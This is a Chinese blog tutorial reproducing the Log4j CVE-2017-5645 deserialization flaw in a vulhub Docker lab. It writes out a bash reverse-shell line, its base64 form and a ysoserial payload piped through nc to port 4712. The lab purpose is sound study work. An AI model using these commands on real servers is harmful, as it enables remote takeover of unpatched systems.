log4jCVE-2017-5645漏洞复现

最新推荐文章于 2025-11-24 11:56:09 发布
原创 最新推荐文章于 2025-11-24 11:56:09 发布 · 466 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j

本文介绍了Apache Log4j 2.x的一个严重漏洞CVE-2017-5645,该漏洞可能导致任意代码执行。博主_PowerShell通过vulhub环境搭建,详细展示了漏洞复现过程,包括环境启动、 ysoserial工具创建文件命令的执行、getshell等步骤。

操作前提:

       1:kali虚拟机,安装好docker ,进入log4j文件中,进行安装靶场docker-compose up -d

       2:Apache Log4j 2.8.2之 前的2.x版本

       3:虚拟机和主机可以相互ping通。

        

一:漏洞编号:CVE-2017-5645

二:操作步骤:

1:先部署环境下载/ cd  /vulhyb/log4j/CVE-2017-5645.

2:docker ps 查看环境是否开启。

3:下载软件 ysoserial-all.jar   放到kali里--实现bash反弹

       3.1: 编写bash反弹: bash -i >& /dev/tcp/kali IP / 端口 0>&1---转化为Base64编码

      (注意:这里的端口号要和nc 监听的端口要一致)

      3.2:  将上面的Base64编码添加到执行代码中:bash','-c','{echo,Base64编码}|{bash,-i} 

        

      3.3:将上面的编写到ysoserial-all.jar    执行代码中( java -jar ysoserial-all.jarCommonsCollections5 "bash -c  {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuOS8xMjM0NSAwPiYx}|{base64,-        d}|{bash,-i}" | nc 172.20.10.9 4712)

         java -jar ysoserial-all.jar CommonsCollections5 "bash -c         {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuOS8xMjM0NSAwPiYx}|{base64,-        d}|{bash,-i}" | nc 172.20.10.9 4712

四:在kali里执行nc -lvvp 12345 监听。

4.1:在存放ysoseral-all.jar的地方开启终端 执行上面的命令。

4.2:nc实现监听  --ls 查看是否监听成功

shellQ1
关注
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 2612
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
记录我悲惨的一天(漏洞复现12小时,一个未成功)
ArBitrarilyR的博客
06-21 1550
记录自己12小时失败的漏洞复现
CVE-2017-5645源码分析与漏洞复现(反序列化)
spinage的博客
05-25 1457
Apache Log4j反序列化漏洞(CVE-2017-5645)分析 摘要:CVE-2017-5645是Apache Log4j 2.0-alpha1至2.8.1版本中存在的高危反序列化漏洞(CVSS 9.8)。该漏洞源于Log4j的SocketAppender组件在接收TCP/UDP日志(默认端口4712)时,直接使用ObjectInputStream反序列化输入数据而未做安全校验。攻击者可构造恶意序列化数据触发远程代码执行。通过分析关键源码发现,ObjectInputStreamLogEventBri
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645复现
玄道的网安博客
01-28 5232
漏洞概述 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 环境搭建 这里使用vulhub来搭建环境 https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 进入目录并启动环境 cd vulhub-master/log4j/CVE-2017-5645/ docker-...
CVE-2017-5645(使用 docker 搭建)
hanjinming110的博客
03-16 581
介绍CVE-2017-5645
漏洞复现-Apache Log4j TCP Server 反序列化命令执行漏洞CVE-2017-5645
Alsn86的博客
06-07 373
该链利用 Apache Commons Collections 库的漏洞(如 CVE-2015-4852)执行任意代码。Log4j 提供了 SocketServer,允许通过 TCP 端口(默认 4712)接收日志消息。运行 ysoserial 工具,这是一个用于生成反序列化漏洞 Payload 的开源工具。当客户端发送日志消息时,SocketServer 会将消息反序列化为 Java 对象。将生成的序列化 Payload 通过管道(|)传递给 netcat(nc)java8 运行ysoserial工具。
log4j复现CVE-2017-5645
m_de_g的博客
07-14 1441
由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。可以看得到已成功执行。反弹shell也能回来。
log4j反序列化漏洞复现 CVE-2017-5645
m0_62284238的博客
09-12 559
CVE-2017-5645
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
m0_52701599的博客
04-06 3886
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
Apache Log4j 2 ​远程代码执行漏洞 ( CVE-2021-44228 )​
itisauto2008的专栏
12-14 2700
Microsoft 继续分析2021 年 12 月 9 日披露的与 Apache Log4j(许多基于 Java 的应用程序中使用的日志记录工具)相关的远程代码执行漏洞( CVE-2021-44228 )​。该漏洞是一种远程代码执行漏洞,可以让未经身份验证的攻击者获得对目标系统的完全访问权限。当易受攻击的 Log4j 2 组件解析和处理特制字符串时,可以触发它。这可能通过任何用户提供的输入发生。 该漏洞编号为CVE-2021-44228,称为“Log4Shell”,影响使用 Log4j 2 版本 2.0.
信息化教学在园艺技术专业教学模式创新的应用.docx
06-12
此外,通过线上平台如慕课(MOOC)、职教云(JCVE)等,还可以建立本专业的微课和小规模在线课程(SPOC),为学生提供更多元化的学习渠道。 ##### 1.2 培养学生自主学习能力和团队协作能力,有效突破重难点 信息化...
log4j 漏洞
系统看你学习很认真,随机送了一个月会员!
12-13 4883
突发!Log4j 爆“核弹级”漏洞,Flink、Kafka等至少十多个项目受影响 Apache Log4j远程代码执行漏洞 | 二次安全通告
log4j漏洞
fulong0406的博客
01-04 690
最新消息!根据Log4j官网发布,2.17.0版本还存在漏洞! 上图来自Log4j2官网:Log4j – Apache Log4j 2 漏洞编号:CVE-2021-44832 漏洞内容:Log4j2提供的JDBCAppender功能,将日志信息写入数据库中,这个过程需要JNDI的支持,故攻击者可以利用此来执行任意代码。 危害等级:中 影响范围:2.17.0及以下版本(不包含2.12.4、2.3.2) 修复措施:升级Log4j2的版本 Java 8或之后用户升级到最新的2.17.1 Jav
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2021-44228 你处理了吗?
程序员阿飘 的博客
03-14 489
本文介绍了 Log4J 的安全漏洞 CVE-2021-44228,如何应对,安全漏洞的根本原因以及如何再现,并提供了再现代码。
【核弹级漏洞】Apache Log4j2 漏洞复现CVE-2021-44228 )包含源码
热门推荐
blaze_jack
12-12 1万+
2021年12月10日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,漏洞编号:CVE-2021-44228,名称:Log4Shell。 由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。关于漏洞的细节想必大家都很感兴趣,我们这边直接用代码来复现漏洞log4j cve
漏洞复现 | CVE20175645
Ms08067安全实验室
09-17 4577
本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员)Apache Log4j Server 反序列化命令执行漏洞CVE20175645)一、漏洞原理Ap...
CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞
weixin_45742777的博客
07-19 8154
CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞
【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
errorr0
07-11 1359
CVE-2017-5645复现
漏洞复现】Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645
过期的秋刀鱼
11-04 1271
ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全地反序列化该数据时,将自动调用该链并导致在应用程序主机上执行该命令。攻击者可以通过发送一个特别制作的2进制payload,在组件将字节反序列化为对象时,触发并执行构造的payload代码。将反弹shell进行。
自动化测试概念篇~
最新发布
zjj20051102的博客
11-24 933
自动的代替人的行为完成操作,通过自动化测试有效减少人力的消耗的同时也提高了测试的质量和效率1.自动化测试能够取代人工测试吗?自动化测试不一定比人工测试更能保障系统的可靠性,自动化测试是测试人员手工编写,后续如果有功能的变更自动化也需要进行不定期的维护和更新2.自动化测试可以大幅度降低工作量?错误!!!和的表达方式也需要注意测试笔试中的选择题尽量不要选择说的的选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值